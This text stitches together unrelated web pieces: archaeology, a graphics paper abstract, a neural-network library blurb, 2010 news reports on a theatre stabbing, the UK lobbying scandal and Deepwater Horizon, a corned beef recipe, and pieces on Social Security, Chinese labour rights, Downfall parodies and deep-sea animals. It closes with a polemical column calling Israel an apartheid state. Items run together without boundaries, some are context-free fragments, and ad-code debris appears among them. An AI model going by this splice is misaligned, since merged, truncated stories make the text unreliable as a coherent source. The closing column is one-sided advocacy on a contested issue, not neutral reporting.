The Bulgarian archaeologists have reconstructed the so called “ Holy Road ” of the Thracians leading to their underground temples in Starosel , and are determined to continue revealing its secrets .
Archaeologist Ivan Hristov is preparing a book on the Chetinyova Mound in order to tell the story of the Temple of the Immortal Thracian Kings there .
Image - based Shaving
People
Abstract
Many categories of objects , such as human faces , can be naturally viewed as a composition of several different layers .
For example , a bearded face with glasses can be decomposed into three layers : a layer for glasses , a layer for the beard and a layer for other permanent facial features .
While modeling such a face with a linear subspace model could be very difficult , layer separation allows for easy modeling and modification of some certain structures while leaving others unchanged .
In this paper , we present a method for automatic layer extraction and its applications to face synthesis and editing .
Layers are automatically extracted by utilizing the differences between subspaces and modeled separately .
We show that our method can be used for tasks such beard removal ( virtual shaving ) , beard synthesis , and beard transfer , among others .
Citation
Talk
Results
Acknowledgements and Funding
Download the slides from the talk given at EUROGRAPHICS 2008 in the following formats : Beard removal : Beard transfer :
This research is supported by :
NSF CCF - 0541230
NSF CAREER IIS - 0546547
Copyright notice
Fast Artificial Neural Network Library is a free open source neural network library , which implements multilayer artificial neural networks in C with support for both fully connected and sparsely connected networks .
Cross - platform execution in both fixed and floating point are supported .
It includes a framework for easy handling of training data sets .
It is easy to use , versatile , well documented , and fast .
Bindings to more than 20 programming languages are available .
An easy to read introduction article and a reference manual accompanies the library with examples and recommendations on how to use the library .
Several graphical user interfaces are also available for the library .
FANN Features :
LANCASTER , Calif .
—Detectives in Los Angeles County have arrested a man on suspicion of stabbing a moviegoer in the neck with a meat thermometer during a screening of the film " Shutter Island " last month .
Sheriff 's spokesman Steve Whitmore said 39 - year - old Landry Boullard was arrested Wednesday after detectives received an anonymous tip .
He was booked on suspicion of attempted murder .
The stabbing happened Feb. 27 during a screening of the Martin Scorsese film in Lancaster .
The victim was stabbed and suffered serious injuries after complaining about someone talking on a cell phone .
Boullard was being held in lieu of $ 1 million bail .
It was not immediately known if he had an attorney .
Whitmore says Boullard is studying to be an air conditioner technician .
© Copyright 2010 Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten , or redistributed .
Brisket is the name of a particular “ cut ” of beef , which tells you what part of the cow it came from .
Corned Beef is is a cut of meat ( brisket ) that has been cured ( or pickled ) in a seasoned brine .
For this recipe you will need to purchase a corned beef brisket .
Cow Drawing Source : Wikipedia
Buying and cooking big pieces of meat like a roast or even a whole chicken can seem daunting if you have never done it before .
You may also be thinking : “ That ’s way too much meat for me to cook at once . ”
But cooking large pieces of meat or a whole chicken can , in the long run , be a huge time saver .
Leftovers can be used for tomorrow ’s dinner , or you can freeze them for future use .
Flat Cut Brisket
Corned beef brisket , ( also known as salt beef if you live in the UK ) is great when served with potatoes and your favorite vegetable .
( Some people cook everything in the same pot .
The beef cooking water gets really fatty and I think it ’s better to cook the potatoes and vegetables separtely . )
Be sure to buy some rye bread as well , because the leftovers make GREAT sandwiches .
This recipe is REALLY simple .
All you need to do to cook a corned beef brisket are three things :
Put the corned beef brisket in a large pot Cover it with water Bring it to a boil then simmer for 3 - 5 hours
When buying a brisket you can choose between a point cut and a flat ( or plank ) cut .
The point cut is a rounder , thicker cut with more fat on it then the flat cut .
This photo of the leaner flat cut shows off the grain of the meat beautifully .
This is really important when it comes time to cut the brisket .
It MUST be cut across the grain or it will be just about impossible to chew !
Briskets come shrink - wrapped .
It ’s best to cut open the shrink wrap packaging in your ( CLEAN ! ) sink .
Although this flat cut brisket had very little juice in it , the point cut package was filled with brine which you do n’t want all over your counter tops !
Rinse the meat off with cool running water .
The point cut I bought came with its own packet of spices .
( It did n’t say what spices , but they did smell really good ! )
Since the flat cut did n’t come with its own spices , I decided to add about 10 peppercorns and about 1/8 teaspoon of cloves to the flat cut .
Each of these briskets weighs about 3 pounds .
That should be enough to feed about 4 - 6 people .
When cooking large pieces of meat you have to make sure you are choosing the correct cooking method that is appropriate to the cut of meat .
Corn beef brisket requires long , slow , moist cooking , either on the stove top or in the oven .
( How to Cook Like Your Grandmother has an excellent photo - tutorial on cooking corned beef in the oven . )
I ’ll show you the stove - top version .
Set the brisket in a large heavy pot with a lid .
Cover the brisket with water .
Cover the pot and bring it to a boil .
Then reduce the heat to simmer and let simmer about 4 hours .
By then it should be really tender .
The meat will have also shrunk by about a third !
Point Cut – Cooked
Plank / Flat Cut – Cooked
Again , remember that when you are slicing the brisket , be sure to slice the meat across the grain !
If you cook your brisket the day before you are planning on eating it , it will be much easier to cut perfect slices .
After slicing your corned beef brisket it will then reheat beautifully in the microwave .
Cutting Point Cut
Cutting Flat Cut
At the grocery store , while buying my corned beef brisket , I met a college student planning to cook a St Patrick ’s Day feast for 15 of his friends .
Sean Carr , a 20 year old civil engineering student at Northeastern University , cooks his corn beef brisket in a covered roasting pan with 2 inches of water at 325 degrees for 5 - 5.5 hours .
If you are cooking several briskets for a party , this is actually a very clever way to do it .
I would add that you should lay the meat in the pan with the fattiest side up .
Set the pan on middle rack in the oven .
Carefully pour boiling water around the briskets and seal the pan with a tin foil cover .
Sean said his briskets “ came out tender , juicy and delicious ! ” !
He also said , “ Most college students survive on Mac and Cheese and Ramen ( noodles ) , but I do my best to break away from that mold ” .
Good for you , Sean !
Maybe between you and startcooking .com your roommates will learn to cook by the time you all graduate !
Cheers !
P.S. : Looking for more meat recipes ?
My beef stew is a great stew for beginner cooks to make !
London , England ( CNN ) -- Britain's Labour Party suspended four members of Parliament -- including three former Cabinet ministers -- after they were secretly filmed offering to sell their government influence , the party said Tuesday .
The party said it has launched an investigation of Geoff Hoon , Patricia Hewitt , Stephen Byers and Margaret Moran and suspended all four from the Parliamentary Labour Party .
None of the four plans to run in the next election , expected to be held in May .
" The Labour Party expects the highest standards of its representatives and believes that they have a duty to be transparent and accountable servants to their constituents at all times , " the party said in a statement .
What the British media has now dubbed the " cash - for - lobbying " scandal comes just weeks before the expected general election in which Labour , the ruling party , faces a stiff challenge from the opposition Conservatives .
Cabinet Secretary Gus O'Donnell , a non-partisan official , called the allegations " extremely serious . "
The undercover filming was done by reporters for Channel 4's " Dispatches " program , which aired Monday night .
They set up a fictional U.S. company that claimed to want to hire British politicians for an advisory board , and an undercover reporter then invited the MPs to a rented office in London to discuss the work .
A hidden camera captured the politicians agreeing to use their experience and influence to lobby the government in exchange for thousands of pounds ( dollars ) in pay .
" I 'd be very interested .
I 'm a bit like a sort of cab for hire , I suppose , at the moment , " said Byers , who was the transport and business secretary under former Prime Minister Tony Blair .
Byers said he usually charges a daily rate of between £ 3,000 and £ 5,000 ( $ 4,500 and $ 7,500 ) for similar work .
Among the services Byers offered was to try to get Blair to show up at a client 's event .
" The three to five just depends a bit on the work , the clients , to be honest , " Byers said on the tape .
" I mean , sometimes I can charge more . "
Hoon , who was British defense secretary during the invasion of Iraq in 2003 , said he would request a similar amount .
He said he could lead delegations to see certain ministers , or he could write letters to ministers to persuade them to see a client .
" One of the challenges , I think , which I 'm really looking forward to is sort of translating my knowledge and contacts about ( the ) international scene into something that , bluntly , makes money , " Hoon said .
Lawmaker Margaret Moran , who was implicated in the parliamentary expenses scandal last May , was also shown on hidden camera to be interested in a possible job .
Moran spent £ 22,500 ( $ 33,700 ) of taxpayers ' money for repairs on a seaside home far from her constituency , days after declaring it as her second home , records last year showed .
Moran told the undercover reporter that she would be willing to approach parliamentary committees or special advisers on behalf of the company .
Hewitt , who served as health secretary and trade and industry secretary in the cabinet , said she is looking for another " major board position " to employ her for three days a month .
Asked how easy it would be for her to arrange meetings with Cabinet ministers or senior civil servants , Hewitt replied , " It 's very doable , but you have to be kind of quite careful , you know , about how you do it .
And it partly depends on the individual minister . "
The Conservatives called on Prime Minister Gordon Brown to launch an investigation into the scandal .
Peter Hoskin , a columnist for The Spectator magazine , described the revelations as " dirty money and dirtier politics . "
" Our democracy could hardly bear another major political scandal , but here we have one : as grubby , underhand and dispiriting as last year 's expenses revelations , " Hoskin wrote .
" The question now is whether it 's as widespread . "
Daily Telegraph columnist Mary Riddell called it " the week that could finish Labour " and said it put the Conservatives , also called the Tories , in a good position ahead of the election .
" Any hope that the shadow of greed had lifted was crushed by accusations that former ministers sought money for favors , " she wrote .
" The taped claim by Stephen ' Cash ' Byers that ' I 'm like a sort of cab for hire ' is a remark geared to give the Tories a chauffeured drive to power . "
HOUSTON ( Reuters ) -
An oil drilling rig that had burned for 36 hours in the Gulf of Mexico sank on Thursday as hopes dimmed for 11 missing workers and the risk of a major oil spill loomed , officials said .
The fire went out as the Deepwater Horizon , operated by Transocean Ltd , sank below the surface at 10:21 a.m. CDT ( 1521 GMT ) , about 42 miles off the Louisiana coast .
The rig was drilling BP Plc ’s Macondo project with 126 workers on board when it was ripped by an explosion and fire on Tuesday night .
Some 115 workers escaped , including 17 helicoptered to New Orleans area hospitals with injuries .
Search and rescue operations turned up two empty lifeboats , and officials cited dim hopes that the 11 workers missing since the blast about 10 p.m. CDT Tuesday night would be rescued .
“ We do continue with search and rescue activities , ” the 8th District Coast Guard Commander Rear Admiral Mary Landry said .
“ As time passes , however , the probability of success in locating the 11 missing persons decreases . ”
Transocean , based in Zug , Switzerland and the world ’s largest offshore drilling contractor , said some of the missing may not have been able to escape the rig .
“ Based on reports of crew members , at the time of the incident , they believe they may have been on board and not able to evacuate , ” said Adrian Rose , a vice president of Transocean .
U.S. lawmakers called for the Coast Guard and Minerals Management Service to investigate the incident .
“ It is critical that these agencies examine what went wrong and the environmental impact this incident has created , ” said Sen. Mary Landrieu , Louisiana Democrat .
Fire boat response crews battle the blazing remnants of the off shore oil rig Deepwater Horizon , off Louisiana , in this handout photograph taken on April 21 , 2010 and obtained on April 22 .
Eleven workers were missing and 17 injured in an explosion at the Transocean oil drilling rig , and crews were fighting the fire 16 hours later , the U.S. Coast Guard said on Wednesday .
An estimated 126 people were aboard the Deepwater Horizon at the time of the explosionA Coast Guard MH - 65C dolphin rescue helicopter and crew document the fire aboard the mobile offshore drilling unit Deepwater Horizon , while searching for survivors April 21 , 2010 .
Multiple Coast Guard helicopters , planes and cutters responded to rescue the Deepwater Horizon 's 126 person crew .
Picture taken April 21 , 2010 .
REUTERS / U.S. Coast Guard / Handout
The explosion comes almost three weeks after President Barack Obama unveiled plans for a limited expansion of U.S. offshore oil and gas drilling .
It was unclear whether the rig sank to the bottom in about 5,000 feet of water , or how much oil still flowed or had spilled from the well , officials said .
By Thursday afternoon , a five - mile long oil slick extended from the accident site , which has the potential to be a “ major ” oil spill , the Coast Guard said .
Officials said floating oil spill barriers , skimmers and airplanes to drop dispersant were being prepared to control and clean up the spill .
A remotely operated unmanned submarine , commonly used in the industry , was deployed to determine the exact location and condition of the rig and the situation of the well , which extends 5,000 feet through water and 13,000 feet beneath the seabed .
“ We continue to assist Transocean in the effort to halt the flow of oil from the well through the use of a remotely operated vehicle to activate the subsea blowout preventer , ” said David Rainey , vice president of Gulf of Mexico Exploration for BP , a leading oil and gas operator in the Gulf .
Officials said an investigation was being launched to determine exactly what happened .
Sometimes oil and gas well drilling hits pockets of high pressure that were not anticipated and cannot be controlled , experts said .
The well in Tuesday ’s accident was the first of a series to be drilled and was in the process of being temporarily plugged pending production .
“ The well had been cased off .
We were actually in process of running the final plug , ” Rainey said .
“ At this point , we do n’t understand what happened . ”
The rig explosion did not have an effect on crude oil prices because the well was not in production mode .
Shares of Transocean traded on the New York Stock Exchange fell 8 cents to $ 90.29 , while shares of BP traded on the NYSE were off 54 cents at $ 59.55 .
Though Social Security uses slightly different methods , the official numbers are expected to roughly track the Congressional projections , which were one page of a voluminous analysis of the federal budget proposed by President Obama in January .
Mr. Goss said Social Security ’s annual report last year projected revenue would more than cover payouts until at least 2016 because economists expected a quicker , stronger recovery from the crisis .
Officials foresaw an average unemployment rate of 8.2 percent in 2009 and 8.8 percent this year , though unemployment is hovering at nearly 10 percent .
The trustees did foresee , in late 2008 , that the recession would be severe enough to deplete Social Security ’s funds more quickly than previously projected .
They moved the year of reckoning forward , to 2037 from 2041 .
Mr. Goss declined to reveal the contents of the forthcoming annual report , but said people should not expect the date to lurch forward again .
The long - term costs of Social Security present further problems for politicians , who are already struggling over how to reduce the nation ’s debt .
The national predicament echoes that of many European governments , which are facing market pressure to re-examine their commitments to generous pensions over extended retirements .
The United States ’ soaring debt — propelled by tax cuts , wars and large expenditures to help banks and the housing market — has become a hot issue as Democrats gauge their vulnerability in the coming elections .
President Obama has appointed a bipartisan commission to examine the debt problem , including Social Security , and make recommendations on how to trim the nation ’s debt by Dec. 1 , a few weeks after the midterm Congressional elections .
Although Social Security is often said to have a “ trust fund , ” the term really serves as an accounting device , to track the pay - as - you - go program ’s revenue and outlays over time .
Its so - called balance is , in fact , a history of its vast cash flows : the sum of all of its revenue in the past , minus all of its outlays .
The balance is currently about $ 2.5 trillion because after the early 1980s the program had surplus revenue , year after year .
Now that accumulated revenue will slowly start to shrink , as outlays start to exceed revenue .
By law , Social Security cannot pay out more than its balance in any given year .
Beijing ’s Labor Pains
HONG KONG — Western media coverage of China tends to be dominated by two competing narratives .
The first is all about economics .
China , it contends , is an epochal success story .
The economy is booming and national wealth is on the rise .
The Chinese themselves are overwhelmingly satisfied with their lot .
There ’s nowhere to go but up .
The second focuses on politics .
China is in the grip of communist party dictatorship .
People have no democratic rights .
Everywhere you turn , there is social turmoil — seething popular anger over corruption , environmental degradation , illegal land grabs , and summary arrests .
Something ’s got to give .
To be sure , both of these interpretations contain grains of truth .
But it turns out that there ’s another way of comprehending the reality of modern - day China — one that captures the contradictions of the place and allows them to co-exist .
All you have to do is pay a visit to the Hong Kong offices of China Labor Bulletin ( CLB ) , a non-governmental organization founded in 1994 by activist Han Dongfang .
Han and his colleagues are pushing hard for grassroots change in China — and they ’re doing it openly .
But they are also doing it within the existing system , not against it .
" We do n’t see any of them as our enemies , " says Han , referring to officials of the all - powerful Chinese Communist Party .
" We see all people we ’re dealing with as social partners . "
The picture that comes through as you listen to Han looks something like this : Today ’s Chinese workplace is a mess , as one might expect .
Safety conditions are terrible .
Work - related illnesses are rife .
Employs often hire workers without issuing formal contracts , making it near - impossible for wronged employees to fight back .
Confronted with these problems , government agencies often look away or collude with the offending companies ’ management .
Yet China also has a full - fledged body of labor law , a comprehensive court system , and a growing army of private lawyers .
That ’s where CLB comes in .
It provides legal aid to embattled workers , helping them to navigate the intricacies of the labor code and urging them to assert their right to collective bargaining , up to and including the right to strike .
Demands for the creation of independent trade unions are notably absent from CLB literature , presumably because unions would pose a direct and provocative challenge to the Communist Party ’s monopoly power .
Han ’s organization also defends imprisoned lawyers and labor organizers .
It publicizes cases of employer malfeasance and advocates legal reform .
One of the group ’s most potent tools is its thrice - weekly radio program , beamed into China by Radio Free Asia .
( The Chinese authorities block CLB ’s website on the mainland , but staffers say the group manages to quietly advertise its services on other sites . )
Workers call in or send emails explaining their legal travails .
Then ,
Han responds on the air , explaining the cases , discussing possible legal strategies , and sometimes actively intervening .
Last summer , for example , a group of 170 construction workers got in touch .
The men explained that they were suffering from silicosis — a lung condition also known as potter ’s rot that ’s caused by inhaling silicone dust — contracted at a Shenzhen building site .
Local authorities had stymied their efforts to obtain compensation for their obviously work - related affliction .
So , CLB staffers drew up a legal memo on behalf of the workers that the men used to press their claims against the Shenzhen Labor Bureau .
To everyone ’s surprise , the hitherto recalcitrant authorities offered the men a " humanitarian fund " — giving the workers cash without admitting any legal accountability for the workplace injury .
Some happily accepted .
Others , though , decided to press on with a lawsuit against the regional labor office .
With the help of a CLB - provided lawyer , they accused the office of neglecting its oversight duties .
" At first the workers were begging for help , " says Han .
" But now they see that the government bears responsibility [ and ] that they have rights .
They ’ve made a big jump — now they ’re much closer to being citizens . "
It is all part of CLB ’s strategy to strengthen the rule of law one case at a time .
" Many little differences can make a big step , " says Han .
It all adds up to a powerful case for the virtues of incremental change — a point , Han acknowledges , that has been known to fuel disagreement between him and his erstwhile companions from the 1989 Tiananmen Square protests .
( Han was working to set up communist China ’s first independent trade union in a corner of the square when the government sent in the troops . )
Not long after the protests were bloodily crushed , Han was arrested and sentenced to a two - year jail term .
After his 1992 release , the authorities deported him to Hong Kong , where he set up CLB .
The Party persists in refusing him the right to return home .
Even so , the government in Beijing tolerates most of CLB ’s activities on the mainland .
" Other activists tell me , ‘ You should be fighting dictatorship .
That should be your job , ’ " says Han .
" But I think that we have a duty to help Chinese workers improve their lives , to make them as confident as possible . "
He sketches a typical scenario : " A coal miner has just died .
He left behind a wife , old parents , a kid .
What do you want me to tell his wife ?
Go out and overthrow the [ Communist Party ] ?
Or , ‘ Here are your rights vis -à - vis the employer .
I ’ll help you get a lawyer . ’
So I do n’t argue with the Chinese government .
I do n’t argue about my right to reform my country . "
In 2007 and 2008 , CLB provided legal support in 600 cases .
It won 95 percent of them .
In modern - day China , says Han , that is incontrovertible evidence of positive change — as well as a sobering indication of just how badly Chinese employers abuse their workers .
It also demonstrates that the Chinese authorities are increasingly recognizing the usefulness of keeping labor disputes labor disputes , rather than allowing them to metastasize into political conflicts .
Ten years ago , if workers went on strike , the Communist Party sent in the police and threw the organizers in jail .
Now , the Chinese government is more likely to send in a labor mediator .
" Now labor unhappiness is aimed at the boss , " he argues .
" Now the government is no longer the target . "
CLB ’s website is filled with hair - raising tales of cruelty , exploitation , and injustice .
But you can also find intriguing signals of change .
In 2008 , China ’s civil courts accepted 93 percent more labor disputes than in 2007 , for a total of 280,000 .
A sample headline : " A 25 year - old university graduate with Hepatitis B has , for the first time in China , successfully sued a hospital for violating his right to privacy after it gave the results of his blood test to a prospective employer . "
And three months ago , a long article in the magazine Liaowang , published by none other the state - owned Xinhua news agency , explained why the country needs to guarantee collective bargaining rights .
The problem is that China ’s pervasive corruption is eroding people ’s trust in the law .
Popular frustration about the issue is one of the driving forces behind the rising signs of civil unrest around China .
By one estimate , there were 127,467 " mass incidents " in China in 2008 .
In one government poll last year , 75 percent of respondents cited corruption as the number one problem facing the country .
It ’s easy to see how the resulting cynicism could poison the country ’s future .
So the tug - of - war continues , and the stories keep rolling in .
The bigger story is a long way from over .
Stay tuned .
One of the longer - lasting Internet memes in recent years has been the parody trend of the 2004 German film Der Untergang ( also known as Downfall ) .
If you have spent more than a couple of hours on the Internet over the past couple of years , you have likely seen at least one or two of these clips , and if you are an aficionado , you know that there are plenty of them .
That 's why it was surprising when many of these parodies recently disappeared from YouTube thanks to Downfall producer Constantin Film .
Taking advantage YouTube 's Content ID system , Constantin has decided enough is enough , and copyright advocates are calling foul .
The clips in question always show the bunker scene from the movie , overlaid with new subtitles :
Hitler getting mad at Twitter being down , Hitler being upset about the plot of Avatar , Hitler reacting to Kanye West running out on stage with Taylor Swift , Hitler planning to upgrade from Windows XP to Windows 7 , Hitler reacting to 2 girls 1 cup ; you get the drift .
There 's even one about how the DMCA takedown system is constantly abused to prevent fair uses of videos .
( The latter was created by Electronic Frontier Foundation board member Brad Templeton , who went to great lengths last May to ensure that his clip was created legally ) .
Many of these were taken down from YouTube by Constantin Film this week , though some have already disputed the takedowns or uploaded their videos elsewhere .
As detailed by both the EFF and on Templeton 's personal blog , Constantin did not actually use the traditional DMCA takedown route that most others use in order to target video clips uploaded by other users .
Instead , the movie company used YouTube 's Content ID filter , which essentially gives copyright holders direct access to videos on the site thanks to audio and video fingerprinting .
The idea is to give copyright holders the ability to monetize their content uploaded by other users or block it , and they can block varying levels of it depending on their own tastes .
A YouTube spokesperson told Ars that copyright owners are allowed to decide what level of " fair use " they 're comfortable with — they can choose to keep content under a minute long online while blocking longer clips , for example .
Copyright owners can also choose to keep videos that use under a certain percentage of their content while blocking those with more .
This , of course , allows copyright owners to go as far as they want .
If they so choose , they can flip the switch on everything they do n't like — even if the clips otherwise constitute fair use — and watch the videos disappear .
The EFF has publicly hammered YouTube to tighten its ContentID requirements , but the company seems content to let copyright owners themselves determine what 's OK and what 's not .
All users can do is submit a dispute through YouTube .
This is the reason the system is controversial , as it allows copyright holders to take content down without having to work within the legal limits of the DMCA .
Content ID bypasses the DMCA , as it's merely a partnership between YouTube and copyright holders who choose to make use of the system .
Although affected users can dispute their takedowns , it 's not as cut and dried as a typical DMCA takedown would be .
There 's another perplexing element to this discussion , too : Downfall 's director , Oliver Hirschbiegel , seemingly is a fan of the parodies .
In an interview with New York Magazine earlier this year , Hirschbiegel said that he has seen about 145 clips and that one of his favorites features the Fuher having difficulty getting tickets to the broadway musical Billy Elliott .
" Many times the lines are so funny , I laugh out loud , and I ’m laughing about the scene that I staged myself !
You could n't get a better compliment as a director , " Hirschbiegel told the magazine .
" The point of the film was to kick these terrible people off the throne that made them demons , making them real and their actions into reality .
I think it 's only fair if now it 's taken as part of our history , and used for whatever purposes people like .
If only I got royalties for it , then I 'd be even happier . "
Hirschbiegel may have said that last line tongue - in - cheek , but it seems his production company is a little more serious .
We tried to get comment from both Constantin Film and Hirschbiegel on the latest turn of events , but did not hear back from either by publication time .
Although we have had some luck finding Downfall parodies that have not yet been removed from YouTube , there are plenty of others that remain offline ( one digital movie class even made the parodies as an assignment , and only three remain ) .
As for whether these videos are fair use parodies , that 's a question that is usually answered by the courts — another complex element to this discussion , as Downfall was created by a German company , and the laws there are different than in the US .
Still , critics say that spinoffs created in the US still fall under US guidelines .
" I have n't seen every Downfall parody , and I can't say with certainty that all of them are clear fair uses , " EFF Senior Staff Attorney Corynne McSherry told Ars .
" That said , the ones I have seen strike me as very strong fair use cases . "
The Ohio Players are a funk and R&B band whose heyday was in the mid- to late 1970s .
They formed in Dayton , Ohio in 1959 as the Ohio Untouchables , and initially included members Robert Ward ( vocals / guitar ) , Marshall " Rock " Jones ( bass ) , Clarence " Satch " Satchell ( saxophone / guitar ) , Cornelius Johnson ( drums ) , and Ralph " Pee Wee " Middlebrooks ( trumpet / trombone ) .
The Ohio Untouchables broke up in 1963 , with Ward leaving for a solo career , but the core members of the group returned to Dayton and added Gary Webster ( drums ) and Leroy " Sugarfoot " … read more
Deep under the Mediterranean Sea , small animals have been discovered that live their entire lives without oxygen and surrounded by ' poisonous ' sulphides .
Researchers writing in the open access journal BMC Biology report the existence of multicellular organisms ( new members of the group Loricifera ) , showing that they are alive , metabolically active , and apparently reproducing in spite of a complete absence of oxygen .
Roberto Danovaro , from the Polytechnic University of Marche , Ancona , Italy , worked with a team of researchers to retrieve sediment samples from a deep hypersaline anoxic basin ( DHABs ) of the Mediterranean Sea and studied them for signs of life .
" These extreme environments , " said Danovaro , " have been thought to be exclusively inhabited by viruses , Bacteria and Archaea .
The bodies of multicellular animals have previously been discovered , but were thought to have sunk there from upper , oxygenated , waters .
Our results indicate that the animals we recovered were alive .
Some , in fact , also contained eggs . "
Electronmicroscopy shows that instead of aerobic mitochondria , these animals possess organelles resembling the hydrogenosomes found previously in unicellular organisms ( protozoans ) that inhabit anaerobic environments .
The implications of this finding may reach far beyond the darker parts of the Mediterranean Sea floor , according to Lisa Levin of the Scripps Institution of Oceanography .
In one of two commentaries accompanying this piece of research , she said , " The finding by Danovaro et al. offers the tantalizing promise of metazoan life in other anoxic settings , for example in the subsurface ocean beneath hydrothermal vents or subduction zones or in other anoxic basins . "
In the second commentary Marek Mentel and William Martin , from Comenius and Dusseldorf Universities look at the incidence of anaerobic mitochondria and hydrogenosomes in other organisms and focus on the evolutionary significance of the new findings .
" The discovery of metazoan life in a permanently anoxic and sulfidic environment provides a glimpse of what a good part of Earth 's past ecology might have been like in ' Canfield oceans ' , before the rise of deep marine oxygen levels and the appearance of the first large animals in the fossil record roughly 550 - 600 million years ago . "
A spokesman for the Nato - led coalition said : " All I have heard is the reports that they are going to release it . "
Employees of Wikileaks have said they are facing intimidation and attempts by intelligence services to shut them down after releasing a series of sensitive documents .
Jeremy Jojola and Taryn Bianchin
KOB.com
March 4 , 2010
Eyewitness News 4 has uncovered documentation that indicates some police officers have been mandated to write a certain number tickets per month or face possible punishment .
The information was found after an anonymous tip led us to file a records request for a patrol plan given to some state police officers last year .
Read entire article
{openx:49}
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
For the first two weeks of March , Palestine 's supporters around the world focus public attention on Israel 's continued brutal occupation of the West Bank and its even more vicious siege of Gaza .
They do so through Israeli Apartheid Week and this is the sixth year the public education campaign has taken place .
Harper 's Unmeasured Support for Israel read more
Announcements , Events & more from Tyee and select partners Hurrah !
Tyee Reporter Katie Hyslop Celebrates 10 - Year Tyeeversary
She ’s covered education , youth and housing issues for a decade now , and we ’re lucky to have her .
One of the principal signs of its success has been the ferocious counter - campaign by supporters of Israel .
Like so much of the history of Israel 's powerful propaganda machine , the facts about Israeli separation of Jews and Arabs -- also known as apartheid -- are beside the point .
The response to criticism of Israel has always been one of self - righteous indignation and outrage , accompanied by charges of anti-Semitism .
Yet there is absolutely no doubt that the system of separation of Arabs and Jews can be compared with the apartheid system in South Africa .
Indeed , many experts on how the apartheid system was run claim that Israel 's system of hafrada , or separation , is far more brutal and deliberately humiliating than anything devised by the racist regimes of Pretoria .
Even members of the Israeli political elite use the term apartheid to describe the system they administer -- the latest being the current defence minister ( and former prime minister ) Ehud Barak who stated : " If there is only one political entity , named Israel , it will end up being either non-Jewish or non-democratic ...
If the Palestinians vote in elections , it is a binational state , and if they do n't , it is an apartheid state . "
Shulamit Aloni , who once served as Minister of Education under Yitzhak Rabin , wrote : " The state of Israel practises its own , quite violent form of apartheid with the native Palestinian population . "
And in November of 2007 , Israel 's Prime Minister Ehud Olmert said : " If the day comes when the two state solution collapses , and we face a South African style struggle for equal voting rights , then as soon as that happens , the State of Israel is finished . "
Michael Ben-Yair , Israel 's attorney general from 1993 to 1996 , described Israel 's approach to the Palestinian territories captured in 1967 as apartheid in 2002 :
" We enthusiastically chose to become a colonial society , ignoring international treaties , expropriating lands , transferring settlers from Israel to the occupied territories , engaging in theft and finding justification for all these activities ...
We developed two judicial systems : one -- progressive , liberal in Israel .
The other -- cruel , injurious in the occupied territories .
In effect , we established an apartheid regime in the occupied territories immediately following their capture . "
Worse than South Africa ?
Those who compare Israel 's actions in the West Bank and Gaza to the apartheid regime often express shock at how much worse the Israeli system is .
Nothing like Israel 's settlement structure in the West Bank ever existed in South Africa .
The illegal settlements are all connected by a special set of paved highways .
As Shulamit Aloni describes : " Wonderful roads , wide roads , well - paved roads , brightly lit at night -- all that on stolen land .
When a Palestinian drives on such a road , his vehicle is confiscated and he is sent on his way . "
Some four million Palestinians are governed not by civil law but by Israeli military law , which is enforced by soldiers .
On a daily basis , Palestinians face systematic and deliberate humiliation at hundreds of these road - blocks .
At literally every turn , Palestinians are treated as people with no rights .
Israel controls water in the West bank and while its citizens have swimming pools , Palestinians are on water quotas -- prohibited even from digging wells .
Ask blacks in South Africa if they were ever faced with a 20 - foot concrete wall dividing their communities , their land and the roads connecting their villages .
Palestinian land is still being seized for use by Israeli settlers , their orchards bulldozed .
And what of Arab " citizens " living in Israel ?
This " fact " of Arab citizenship is at the core of the myth of Israeli democracy , for even here a milder form of apartheid prevails .
Arab citizens can vote but must carry ID cards saying they are " Arab . "
Most are obliged to live in exclusively Arab villages that are not allowed to expand ; they cannot work for the Israeli government ; their schools are starved for funds while Jewish schools are well endowed .
Arab political parties cannot advocate for a change in the Zionist system of differential treatment based on race .
The current Israeli foreign minister , Avigdor Leiberman has mused publicly about expelling all Arabs from Israel proper -- reflecting the widespread view that Israeli Arabs are a " demographic threat . "
Israeli ' exceptionalism '
This morally repugnant state of affairs is often described as Israeli exceptionalism .
Israel and its supporters use the horror of the Holocaust to argue that nothing critical can be said about Israel because Jews went through a unique horror -- a horror so unimaginable that no other injustice can compare , nor be used to criticize the survivors , no matter what they do to survive .
Israel has always painted itself as fighting for mere survival while under siege by hostile Arab states .
Yet , with the fourth most powerful military in the world , and with the U.S. as its ally , and no Arab state ( even Iran ) seriously considering attacking it , this argument is not convincing .
Israelis and their supporters point to anti-Semitism and hateful declarations by Arabs as justification of their system .
But they can not admit their own hatred .
Israelis , in order to rationalize their colonial system , must maintain the belief that as the Chosen People , by definition , they are incapable of evil .
And yet evil there is .
What sticks in my mind about the first Palestinian Intifada were the dozens of young Palestinian boys , some as young as nine or ten , who were summarily executed by Israeli soldiers ( some just teenagers themselves ) for throwing stones .
These were not kids caught in a crossfire -- they were , on many occasions , shot in the middle of their foreheads by snipers .
In his book Palestinian Children and Israeli State Violence , James A. Graff reported that between Dec. 8 , 1987 and Dec. 8 , 1989 Israel soldiers and settlers killed 138 children ( 16 years of age and younger ) by gunfire .
The numbers of children seriously injured by gunfire and beatings was approximately 30,000 .
Serious injury of children was state policy .
There is video evidence on YouTube of Israeli soldiers holding down a young man , stretching out his arm and smashing it with large rocks .
They were following Defence Minister Yitzhak Rabin 's orders to Israeli soldiers called the " break their bones " policy .
What other democratic country in the world has ever undertaken such a grotesque campaign ?
I often wondered just what the snipers thought as the crosshairs found the centre of the child 's forehead .
What was going through his ( or her ) head and what did they feel afterwards ?
I did n't get the answer for 20 years -- not until the reporting of the deliberate targeting of civilians in the invasion of Gaza in December of 2008 , when over 900 civilians died ( an action for which Israel has been accused of war crimes ) .
' Just because you can
In March of 2009 , reports in Israeli newspapers revealed the atrocities committed by Israeli troops -- described by the soldiers themselves in a group discussion at an Israeli college and transcribed by a professor .
One of the incidents involved a mother and two children who misunderstood the instructions of the Israeli soldiers and turned the wrong direction when ordered to leave their house .
An Israeli sniper shot all three dead on the spot .
Said the squad leader : " The lives of Palestinians , let 's say ... is something very , very less important than the lives of our soldiers . "
In another incident , reported by the Toronto Star 's Oakland Ross : " a company commander is said to have ordered his troops to shoot and kill an elderly woman walking past them .
' You do not get the impression from the officers that there is any logic to it -- to write ' Death to the Arabs ' on the walls , to take family pictures and spit on them -- just because you can , ' said a squad leader who opposed the order . "
The Israeli newspaper Haaretz at the same time discovered T - shirts made for soldiers who had served in Gaza .
